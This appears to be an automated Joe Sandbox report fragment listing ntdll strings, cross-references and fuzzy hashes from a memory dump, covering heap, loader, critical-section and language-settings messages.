                                                                                                                                                                                • Critical section address., xrefs: 333A530D
                                                                                                                                                                                • Invalid debug info address of this critical section, xrefs: 333A52C1
                                                                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333A52ED
                                                                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 333A534E
                                                                                                                                                                                • Address of the debug info found in the active list., xrefs: 333A52B9, 333A5305
                                                                                                                                                                                • double initialized or corrupted critical section, xrefs: 333A5313
                                                                                                                                                                                • Critical section debug info address, xrefs: 333A522A, 333A5339
                                                                                                                                                                                • Thread identifier, xrefs: 333A5345
                                                                                                                                                                                • Critical section address, xrefs: 333A5230, 333A52C7, 333A533F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                                                                • Opcode ID: f001c8b754fda4f5b88a9e2ee0c112db02532d7e77ae182a9287d0df0fc33be4
                                                                                                                                                                                • Instruction ID: 3c00e0cacbd4c77cc73287e111ea269ce7712ac63efce427e97925ec2037c0ed
                                                                                                                                                                                • Opcode Fuzzy Hash: f001c8b754fda4f5b88a9e2ee0c112db02532d7e77ae182a9287d0df0fc33be4
                                                                                                                                                                                • Instruction Fuzzy Hash: 54819DB5D02318AFEB10CF98CC80B9EBBB9FF48715F148159E954BB281C7B8A941CB54
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.53
                                                                                                                                                                                • API String ID: 0-1130328624
                                                                                                                                                                                • Opcode ID: 2db0ad90013366ef80b6796ad1ed53181fad8f7d80edc337438be169a7242beb
                                                                                                                                                                                • Instruction ID: 542fe4b5537ce53dbd74694ab5236ede21bc159af3769cff7ff5d0ed12607f8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 2db0ad90013366ef80b6796ad1ed53181fad8f7d80edc337438be169a7242beb
                                                                                                                                                                                • Instruction Fuzzy Hash: 74B19EB69093419FD711CF24C880B6FBBE8AF88754F45892EF9A4D7240DB74D948CB92
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                • Opcode ID: d0c979cb45396c9bca62290eb77d8e98395110b4981914f1d449971226c40c1e
                                                                                                                                                                                • Instruction ID: 46220305df4e51df49dc30623c04892ab06b68f450d0d065c9124580e3d86350
                                                                                                                                                                                • Opcode Fuzzy Hash: d0c979cb45396c9bca62290eb77d8e98395110b4981914f1d449971226c40c1e
                                                                                                                                                                                • Instruction Fuzzy Hash: DA519DB69043119BD315DF18CC80AABB7ECEB84351F048A1DF999CB150E774E605CB92
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                • API String ID: 3446177414-1745908468
                                                                                                                                                                                • Opcode ID: 01f46edb7e94530a23ddb37e8c679979af8a879a0c694202b60ff079f223df76
                                                                                                                                                                                • Instruction ID: f7722536e8a476c523406b6a0db7b3f261b51092b439dbe201eb80b3dc893b59
                                                                                                                                                                                • Opcode Fuzzy Hash: 01f46edb7e94530a23ddb37e8c679979af8a879a0c694202b60ff079f223df76
                                                                                                                                                                                • Instruction Fuzzy Hash: 1791EE7AD00744DFDB02DFA8C890AADBBF2FF49710F18C259E455ABA52CB759941CB10
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3332D06F
                                                                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3332D0E6
                                                                                                                                                                                • h.53, xrefs: 3338A5D2
                                                                                                                                                                                • @, xrefs: 3332D24F
                                                                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3332D202
                                                                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 3332D136
                                                                                                                                                                                • @, xrefs: 3332D09D
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3332D263
                                                                                                                                                                                • @, xrefs: 3332D2B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.53
                                                                                                                                                                                • API String ID: 0-2331986510
                                                                                                                                                                                • Opcode ID: 2fe049835602204fe64ea2294325d7a9328fd7eb3561fa4144d856dba41f0ea6
                                                                                                                                                                                • Instruction ID: e3d1e25024cff13e5d17221b44edd4d96e3e6e8b865e445b919800c2e9a6eb3e
                                                                                                                                                                                • Opcode Fuzzy Hash: 2fe049835602204fe64ea2294325d7a9328fd7eb3561fa4144d856dba41f0ea6
                                                                                                                                                                                • Instruction Fuzzy Hash: A9A13DB19093459FE361CF14C880B9BBBE8BF84755F00892EF599D6640EB78D948CF92
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3335D879
                                                                                                                                                                                  • Part of subcall function 33334779: RtlDebugPrintTimes.NTDLL ref: 33334817
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                                                • Opcode ID: 883a8a79fd5c29ae611e8e74a7d21c0d0223467c45d71a6175e0ed90a58485ad
                                                                                                                                                                                • Instruction ID: 64eeb1b5d80cc8b11e36ed4c6b6f496a1eecb29b86b4dbe96208853449017428
                                                                                                                                                                                • Opcode Fuzzy Hash: 883a8a79fd5c29ae611e8e74a7d21c0d0223467c45d71a6175e0ed90a58485ad
                                                                                                                                                                                • Instruction Fuzzy Hash: EF51DC75E443459FEB04DFA4C884BADBBF1BF44714F28C159E800BB691DB74A986CB80
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                • API String ID: 0-2224505338
                                                                                                                                                                                • Opcode ID: 3f45c31bf91b0d3248d75273ba0badb6387b49b63970b73ea02690bd988fa49f
                                                                                                                                                                                • Instruction ID: 76f03bd11a949e233925a25f9428ff0aea9c9986fb85715a2d73a6b98235ac0b
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f45c31bf91b0d3248d75273ba0badb6387b49b63970b73ea02690bd988fa49f
                                                                                                                                                                                • Instruction Fuzzy Hash: DB51F377916344EFD701CFA4C8E4E5ABBA8EF04AA4F14C599F401EBA62CA75DA50CE10
                                                                                                                                                                                Strings
                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 333B86E7
                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 333B880F
                                                                                                                                                                                • VerifierDlls, xrefs: 333B893D
                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 333B86BD
                                                                                                                                                                                • VerifierDebug, xrefs: 333B8925
                                                                                                                                                                                • HandleTraces, xrefs: 333B890F
                                                                                                                                                                                • VerifierFlags, xrefs: 333B88D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                                                                • Opcode ID: 439fce3faad95d7ac558cce946e5a17b44e323d744728d3265e8544f7a5a2121
                                                                                                                                                                                • Instruction ID: 67e74919c6b46f1688c7e0952588d28e7ac69cc6ee6a5c745f5448dcbc4626d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 439fce3faad95d7ac558cce946e5a17b44e323d744728d3265e8544f7a5a2121
                                                                                                                                                                                • Instruction Fuzzy Hash: 29910171D41391AFEB11EF24C880B1AB7F8EB40A55F458998F980FFA91C7309805CB96
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 3339A7A5
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 3339A7AF
                                                                                                                                                                                • DG03, xrefs: 33352382
                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3339A79F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: DG03$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-3833620374
                                                                                                                                                                                • Opcode ID: e4b4d6cacc76c0b8983e8c29c7f5fdc4a8859a92fd11a4efe07fdacb4c96da66
                                                                                                                                                                                • Instruction ID: 4572b28185be2e12c6cb69b1685e17abdc053d78612ece2a570abe8b1532a9aa
                                                                                                                                                                                • Opcode Fuzzy Hash: e4b4d6cacc76c0b8983e8c29c7f5fdc4a8859a92fd11a4efe07fdacb4c96da66
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A31C076E45200EFF714EF59CC81B9A7BF9EB90B50F188199F810F7251EBB099428B50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-523794902
                                                                                                                                                                                • Opcode ID: 61a675fc75e01b9716966a50bf9f255089393a775f22d478578507d4c542aa6f
                                                                                                                                                                                • Instruction ID: 58a61d8781b608a109c4bf41d3446f098d16fea4dbf438ce089c92ffd508e547
                                                                                                                                                                                • Opcode Fuzzy Hash: 61a675fc75e01b9716966a50bf9f255089393a775f22d478578507d4c542aa6f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F42FF75A087819FD305CF28C880A2ABBE9FF84744F48CA6DE485CB751DB34E949CB52
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.53
                                                                                                                                                                                • API String ID: 0-2616635974
                                                                                                                                                                                • Opcode ID: 8ef697888c9916384cacc6d1de2cfe5bb624d47564298b4e412cbdf05732d7f1
                                                                                                                                                                                • Instruction ID: b52e5ed69a572fdd92a1503ac832d0adaf2fe2f87f79d535cfd58a88df830062
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ef697888c9916384cacc6d1de2cfe5bb624d47564298b4e412cbdf05732d7f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 86F13CB6D51219EFEB01CF99C980EDEBBFCEF08650F55805AE505E7610EB74AE018B90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                • API String ID: 0-122214566
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                Strings
                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 333A1FA9
                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 333A1F8A
                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 333A1F6A, 333A1FA4, 333A1FC4
                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 333A1F6F
                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 333A1FC9
                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 333A1F82
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 333A80E2
                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 333A80E9
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 333A80F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 333B4519
                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 333B450F
                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 333B4508
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                • API String ID: 0-3061284088
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                Strings
                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3336847E
                                                                                                                                                                                • @, xrefs: 333684B1
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33368341
                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 33368342
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-1918872054
